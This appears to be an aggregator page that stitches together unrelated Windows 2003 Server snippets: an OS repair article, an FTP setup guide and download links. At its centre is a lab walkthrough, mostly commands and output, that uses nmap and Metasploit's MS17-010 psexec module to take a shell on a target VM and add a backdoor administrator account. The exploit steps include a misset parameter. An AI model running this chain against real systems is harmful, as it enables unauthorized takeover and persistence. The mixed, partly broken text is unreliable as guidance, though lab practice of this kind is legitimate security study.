精华内容
下载资源
问答
  • Effectively Repairing Windows 2003 Server Posted by decipherinfosys on February 16, 2007 Every now and then a Windows 2003 Server’s oper
     
    

    Effectively Repairing Windows 2003 Server

    Posted by decipherinfosys on February 16, 2007

    Every now and then a Windows 2003 Server’s operating system will become corrupted, and repair procedures to bring the server back online must be initiated. These procedures vary from one organization to the next, but there is one step that all system administrators should add to their checklists if they have not done so already – the Windows repair feature. This feature is accessed by booting the damaged server from the Windows 2003 Server installation CD.

     Repair vs. Recovery

    The Repair feature should not be confused with the Recovery Console, which is also accessed from the boot CD. The Recovery Console is a much less comprehensive repair tool, and requires that you  either use a repair (floppy) disk or manually copy files from a CD or floppy to the server’s %Windows% directory manually via a command line. Most of you have probably tried both with limited or no success. The repair disks must be constantly updated to account for changes to the server’s configuration, otherwise the recovery will fail. Manually copying system files is only effective if you know exactly which files are corrupt and need to be replaced, which is nearly impossible. In addition, if dozens or hundreds of files need to be replaced, manually copying them via a command line can become quite tedious.

    The option to actually repair the operating system is a little deeper into the Windows installation process. Once the system has been booted with the Windows 2003 installation CD, you will see the option to repair the system via the Recovery Console first, as shown below:

    windowsrepair1b.jpg

    At this point you will want to select Enter to set up Windows now. After agreeing to the licensing disclaimer you will arrive at the following screen:

    windowsrepair2b.jpg

    Here you will select “R” to repair the Windows installation. What follows looks suspicously like a full reinstall, but have no fear – it is not. The repair simply overwrites the Windows system files, and will allow the system to recover at least 90% of the time. The repair will save all system and application settings, so you will not need to re-specify the server’s name. In addition,  you will not have to reinstall any of the applications running on the server. The author has personally had success with this repair procedure, and has been able to recover systems suffering from a number of ailments, including damage caused by viruses, TCP/IP stack problems, as well as system files corruption resulting from poorly fragmented disks.

    展开全文
  • #用VMware塔建Windows2003Server靶机,IP地址是:192.168.137.128 #还部分信息没截图就省略了 #塔建仅主机模式(Host-Only)网络Windows2003Server可以上网 #打勾允许其他网络用户...

    根据上篇的搭建:https://blog.csdn.net/qq_41709494/article/details/89278964

     #用VMware搭建Windows2003Server靶机,IP地址是:192.168.137.128

    #还部分信息没截图就省略了

    #搭建仅主机模式(Host-Only)网络Windows2003Server可以上网 

    #打勾允许其他网络用户通过此计算的Internet连接来连接,选择网卡VMware Network Adapter VMnet1,下图可以看到LAN适配器将设置成使用IP地址192.168.137.1

    #注意:网络号就要设置成IP192.168.137.0,选择网卡要查看是否VMware的仅主机模式网卡

    #根据上图把子网IP设置为 192.168.37.0和启动DHCP

    #可以ping百度就成功了,可以上网了

     

    根据上篇的搭建:https://blog.csdn.net/qq_41709494/article/details/89278964

    #用VirtualBox搭建的Kali并用仅主机(Host-Only)网络的IP连接Xshell,Kali的仅主机的IP是192.168.30.3

    #连接上Xshell查看Kali的IP地址 

     #利用nmap扫描漏洞

    root@kali:~# nmap --script=vuln 192.168.137.128    # 参数的--script=vuln IP 扫描该IP的漏洞
    Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 22:23 CST
    Nmap scan report for 192.168.137.128
    Host is up (1.0s latency).
    Not shown: 993 closed ports
    PORT     STATE SERVICE
    21/tcp   open  ftp
    |_sslv2-drown: 
    80/tcp   open  http
    |_http-csrf: Couldn't find any CSRF vulnerabilities.
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    135/tcp  open  msrpc
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds
    1025/tcp open  NFS-or-IIS
    1026/tcp open  LSA-or-nterm
    
    Host script results:
    | smb-vuln-ms08-067: 
    |   VULNERABLE:
    |   Microsoft Windows system vulnerable to remote code execution (MS08-067)
    |     State: VULNERABLE
    |     IDs:  CVE:CVE-2008-4250
    |           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
    |           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
    |           code via a crafted RPC request that triggers the overflow during path canonicalization.
    |           
    |     Disclosure date: 2008-10-23
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
    |_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
    |_smb-vuln-ms10-054: false
    |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
    | smb-vuln-ms17-010: 
    |   VULNERABLE:
    |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    |     State: VULNERABLE
    |     IDs:  CVE:CVE-2017-0143
    |     Risk factor: HIGH
    |       A critical remote code execution vulnerability exists in Microsoft SMBv1
    |        servers (ms17-010).
    |           
    |     Disclosure date: 2017-03-14
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
    |       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
    |_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
    |_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
    
    Nmap done: 1 IP address (1 host up) scanned in 150.48 seconds
    

    #找到ms17-010漏洞 

     #开启metasploit-framework

    #搜索漏洞模块 

    msf5 > search ms17-010
    
    Matching Modules
    ================
    
       #  Name                                           Disclosure Date  Rank     Check  Description
       -  ----                                           ---------------  ----     -----  -----------
       1  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
       2  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
       3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
       4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
       5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
    
    

    #使用漏洞模块

    msf5 > use exploit/windows/smb/ms17_010_psexec  
    msf5 exploit(windows/smb/ms17_010_psexec) > 
    

    #查看模块信息

    msf5 exploit(windows/smb/ms17_010_psexec) > info
    
           Name: MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
         Module: exploit/windows/smb/ms17_010_psexec
       Platform: Windows
           Arch: x86, x64
     Privileged: No
        License: Metasploit Framework License (BSD)
           Rank: Normal
      Disclosed: 2017-03-14
    
    Provided by:
      sleepya
      zerosum0x0
      Shadow Brokers
      Equation Group
    
    Available targets:
      Id  Name
      --  ----
      0   Automatic
      1   PowerShell
      2   Native upload
      3   MOF upload
    
    Check supported:
      No
    
    Basic options:
      Name                  Current Setting                                                 Required  Description
      ----                  ---------------                                                 --------  -----------
      DBGTRACE              false                                                           yes       Show extra debug trace info
      LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
      NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
      NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
      RHOSTS                                                                                yes       The target address range or CIDR identifier
      RPORT                 445                                                             yes       The Target port
      SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
      SERVICE_DISPLAY_NAME                                                                  no        The service display name
      SERVICE_NAME                                                                          no        The service name
      SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
      SMBDomain             .                                                               no        The Windows domain to use for authentication
      SMBPass                                                                               no        The password for the specified username
      SMBUser                                                                               no        The username to authenticate as
    
    Payload information:
      Space: 3072
    
    Description:
      This module will exploit SMB with vulnerabilities in MS17-010 to 
      achieve a write-what-where primitive. This will then be used to 
      overwrite the connection session information with as an 
      Administrator session. From there, the normal psexec payload code 
      execution is done. Exploits a type confusion between Transaction and 
      WriteAndX requests and a race condition in Transaction requests, as 
      seen in the EternalRomance, EternalChampion, and EternalSynergy 
      exploits. This exploit chain is more reliable than the EternalBlue 
      exploit, but requires a named pipe.
    
    References:
      https://technet.microsoft.com/en-us/library/security/MS17-010
      https://cvedetails.com/cve/CVE-2017-0143/
      https://cvedetails.com/cve/CVE-2017-0146/
      https://cvedetails.com/cve/CVE-2017-0147/
      https://github.com/worawit/MS17-010
      https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf
      https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/
    
    AKA:
      ETERNALSYNERGY
      ETERNALROMANCE
      ETERNALCHAMPION
      ETERNALBLUE
    

    #查看模块参数选择 

    msf5 exploit(windows/smb/ms17_010_psexec) > show options 
    
    Module options (exploit/windows/smb/ms17_010_psexec):
    
       Name                  Current Setting                                                 Required  Description
       ----                  ---------------                                                 --------  -----------
       DBGTRACE              false                                                           yes       Show extra debug trace info
       LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
       NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
       NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
       RHOSTS                                                                                yes       The target address range or CIDR identifier
       RPORT                 445                                                             yes       The Target port
       SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
       SERVICE_DISPLAY_NAME                                                                  no        The service display name
       SERVICE_NAME                                                                          no        The service name
       SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
       SMBDomain             .                                                               no        The Windows domain to use for authentication
       SMBPass                                                                               no        The password for the specified username
       SMBUser                                                                               no        The username to authenticate as
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    

    #向靶机payload执行动态在远程主机上的代码,使靶机交出Shell

    msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/shell_bind_tcp
    payload => windows/shell_bind_tcp
    

     #设置攻击目标的IP

    msf5 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.137.128
    rhosts => 192.168.137.128
    

    #设置反连的本主机IP

    msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 192.168.30.3
    rhost => 192.168.30.3
    

    #实施攻击靶机

    msf5 exploit(windows/smb/ms17_010_psexec) > exploit 
    

    #入侵Windows2003Server

    #Xshell工具乱码了,就用gbk格式就可以了

     

     #实施提取权限

    #创建abc用户,密码为123456

    C:\WINDOWS\system32>net user abc 123456 /add
    net user abc 123456 /add
    命令成功完成。
    

     #添加管理组

    C:\WINDOWS\system32>net localgroup administrators abc /add
    net localgroup administrators abc /add
    命令成功完成。
    

    #查看用户abc

     #入侵成功了

     

    下篇再续Kali入侵...

     

     

     

     

     

     

     

     

     

    展开全文
  • Windows 2003 Server中FTP服务器的搭建

    千次阅读 2018-05-31 14:25:47
    1. 安装FTP服务器在【控制面板】中双点【添加/删除程序】,在出现的对话框中单击【添加/删除Windows组件】,在...2.Windows 2003 Server中FTP服务器的设置连续选择【开始】|【程序】|【管理工具】|【Internet...

    1. 安装FTP服务器

    在【控制面板】中双点【添加/删除程序】,在出现的对话框中单击【添加/删除Windows组件】,在【Windows组件向导】中双击【Internet信息服务】,在【Internet信息服务】列表中,选择【文件传输协议(FTP)服务器】,单击【确定】进行安装。

    2.Windows 2003 Server中FTP服务器的设置

    连续选择【开始】|【程序】|【管理工具】|【Internet信息服务】,进入【Internet信息服务】窗口,右击【默认FTP站点】,选择【属性】,打开属性设置对话框

    (1)配置FTP属性

    (a)设置【FTP站点】选项

    选择属性设置对话框的【FTP站点】选项卡。在【IP地址】处填入服务器的IP地址;【FTP端口】处填入端口号,一般默认为21;【连接】用来设置允许同时连接服务器的最大连接数;【连接超时】用来设置等待时间,如果连接服务器的用户超过等待时间而没有进行操作,服务器自动断开连接。

    (b)设置【安全账号】选项

    选择【安全账号】选项卡,设置访问FTP站点的用户及管理员账号。若允许匿名访问,则选中【允许匿名访问】复选框,否则将其设为无效;单击【连接】,为FTP服务器添加操作员,默认的情况下,系统已经设定为系统管理员账号Administrator。

    (c)设置【信息】选项

    选择【信息】选项卡,在【欢迎信息】、【退出】框内输入欢迎信息,并设置最大连接数。

    (d)设置【主目录】选项

    FTP站点的【主目录】选项卡与WWW服务的【主目录】选项卡类似。选择【主目录】选项卡,在【本地路径】中输入路径名,或通过【浏览】进行选择。

    (e)设置【目录安全性】选项

    选择【目录安全性】选项卡,通过选择【授予访问】或【拒绝访问】禁止某些IP地址访问FTP服务器。

    (2)设置上传目录

    在【Internet信息服务】管理器中,右击【默认FTP站点】,连续选择【新建】|【虚拟目录】,进入虚拟创建向导。单击【下一步】按钮,输入虚拟目录别名,可以是中文或英文,单击【下一步】按钮,设置用户上传到服务器的实际目录,在【路径】中输入上传目录的路径名,或通过【浏览】进行选择,单击【下一步】按钮为虚拟目录设置上传权限,其中【读取】表示只能下载,【写入】表示允许上传。这里选择【写入】。



    六、验证FTP服务器

    1.打开浏览器,在地址栏中输入FTP://FTP服务器的IP地址/,按回车。

    2.选择“文件”“登录:在登录对话框中输入用户名和密码即可登录。

     

    展开全文
  • Windows 2003 server下载

    2018-10-27 13:43:00
    http://www.downza.cn/soft/182837.html或http://www.imsdn.cn/operating-systems/windows-server-2003/ 转载于:https://www.cnblogs.com/sea-stream/p/9860951.html

     

    http://www.downza.cn/soft/182837.html

    http://www.imsdn.cn/operating-systems/windows-server-2003/

     

    转载于:https://www.cnblogs.com/sea-stream/p/9860951.html

    展开全文
  • Windows 2003 Server下安装MSN9
  • windows 2003 server r2 xp win7-32位 一、 域控服务器安装  1、控制面板中的安装卸载程序中,打开组件,安装DNS组件。  2、开始运行中输入dcpromo命令打开AD,启动安装域控向导安装域控。 ...
  • Windows 2003 Server服务自动关闭

    千次阅读 2011-09-07 09:46:52
    今天上午,北街到中国人寿保险股份有限公司重庆分公司做服务器维护,经过和这边的工程师交流之后得知他们有一台 DL580 64 位的服务器,安装 Windows 2003 server enterprise edition R2 32 位操作系统运行正常,但是...
  • 最近帮老板搞一台Windows 2003 Server的服务器,他要我把一个ASP项目和ASP.NET项目都跑起来。自他发布命令以来,我是寝食难安,因为Windows 2003 Server实在是太搞了。为了把我的惨痛经历招告世人,也为了后人我要走...
  • Windows 2000、Windows XP 和 Windows 2003 Server定时开机与关机设置   移步至个人小站:www.very321.com 一、定时开机设置  定时开机需要计算机主板的BIOS支持。下面以Award BIOS为例,简单介绍如何定时...
  • win10系统访问windows 2003 server里的共享文件时直接闪退是怎么回事?怎么解决?
  • 配制Windows 2003 Server Active Directory额外域控制   配制Windows 2003 Server ActiveDirectory 复制伙伴 环境: 域: pjj.com  DC:PjjA (IP:192.168.9.101) Member Server...
  • Windows 2003 server R2上Webdav攻略

    千次阅读 2011-03-17 18:36:00
    Windows 2003 server R2上Webdav攻略 本文介绍在 Windows 2003 server R2 的IIS上配置Webdav的具体方法。WebDAV(WebDistributedAuthoringandVersioning)扩展了HTTP1.1通信协议的功能,它让具备适当...
  • 在局域网中我们常常需要在服务器上共享一些文件供局域网用户使用,本文以图文并茂的方式汇总了Windows 2003 server共享文件设置的一些方法技巧。用户既可以设置需要用户名和密码并且访问权限不同的共享文件访问设置...
  • windows 2003 server密码恢复

    千次阅读 2007-11-06 17:15:00
    控股公司的系统管理员修改了 windows 2003 server标准版超级管理员的登录密码,但把新密码忘记了。恢复过程:1.用可以查看NTFS格式的DOS系统启动服务器,将c:/window/repair文件夹中的SAM文件复制到c:/windows/...
  • windows2003server域服务器配置说明

    千次阅读 2012-08-10 23:27:24
    windows2003server域服务器配置说明 把一台成员服务器提升为域控制器(一) 目前很多公司的网络中的 PC 数量均超过 10 台:按照微软的说法,一般网络中的 PC 数目低于 10 台,则建议采对等网的工作模式,而如果超过...
  • Windows2003 Server上安装jbuilderX

    千次阅读 2005-11-23 16:04:00
    Windows2003 Server上安装jbuilderXJBuilderX on Windows 2003 serverWindows2003 Server上安装JbuilderX出现错误java.lang.StringIndexOutOfBoundsException: String index out of range: -92at java.lang....
  • 您在Windows 2003 Server上点击WoSign颁发的SHA2签名算法SSL证书时,如果显示如下图1所示证书错误信息,这有可能是FTP传输证书公钥文件时损坏了证书文件。请再点击“详细信息”,如果你看到如下图2所示的“签名算法...
  • 周末打算装Windows 2003 Server系统,今天在网上浏览,发现下面的帖子,算是比较幸运吧如果你有移动硬盘,如果你使用Windows 2003 Server操作系统,那么或者你已经发现了,当然插上活动硬盘的时候,在我的电脑里面...
  • 目录 MS08-067 CVE-2017-7269 MS08-067 发布日期:2008/10/22 针对端口:139、445 ...Server 2003;Vista;Server 2008;7 Beta 漏洞原理:攻击者通过特制的RPC请求发给存在漏洞的主机,将可导...
  • windows2003SERVER安全设置实例

    千次阅读 2009-09-23 15:14:00
    windows2003SERVER安全设置实例 自己不维护服务器,不知道维护服务器的辛苦。刚开始为了嫌麻烦,抱有侥幸心理,一些繁琐的安全设置没有配置,结果服务器连一天都没撑过去。经过10天的反复摸索和努力,现在服务器已经...
  • 本例主要讲解Tomcat6.0与windows 2003 server 的IIS服务器集成的问题,用到的工具版本如下:jdk是6.0、Tomcat 6.0、windows 2003 server 的IIS。详细讲解请见:http://download.csdn.net/source/874121由于操作是...
  • 背景:使用盘装windows 2003 server,安装后,使用万能驱动安装后所有驱动,设备管理器未显示有异常。 现象:网络连接设置IP后,显示连接成功,开始可以打开baidu并浏览网页,一段时间后无法接受数据包,即断网...
  • 这里记录一下Windows 2003 Server报 由于这台计算机没有远程桌面客户端访问许可证 问题的解决办法 1.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSLicensing在客户端把这个注册表项删掉(以前也一直是这么解决的,...
  • 今天下午刚从客户坐车回来,晚上洗完澡,闷热的天气让人睡不着觉,就和大家分享一下windows2003 server socket端口的默认5000的数量修改方式。  导致问题:从项目上线之后,客户说一个月就会宕机一次,系统用户...
  • 今日在给别人做一个网站,其中有视频这一...原来windows2003 server默认无法播放.flv格式的文件。需要配置。详细过程如下:   1.在2003服务器上,找开IIS管理器。  2.选择网站,右击选择属性,选择在Http头文件
  • Windows 2003 Server下的定时运行指定URL执行定时任务 定时任务:windows server 2003下的任务计划 设置参考如下: 选择如下的运行程序:run.bat 编写一个批处理文件run.bat.内容如下: @echo off  echo...
  • windows2003 server 中文 sp2 下载地址:...
  • issue:If your web application installed on windows 2003 server canot work well, or display to visitor: canot found the page. solution:while install IIS server from application server options
  • T400_276563C安装windows 2003 server 全过程

    千次阅读 2011-07-09 02:21:26
    时间2011-07-08,机器型号276563C,系统安装的是windows 2003 server 企业版R2,大多数驱动下载自think.lenovo.com.cn, http://think.lenovo.com.cn/support/driver/driversdownlist.aspx?categoryid=30014下面...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 25,336
精华内容 10,134
关键字:

windows2003server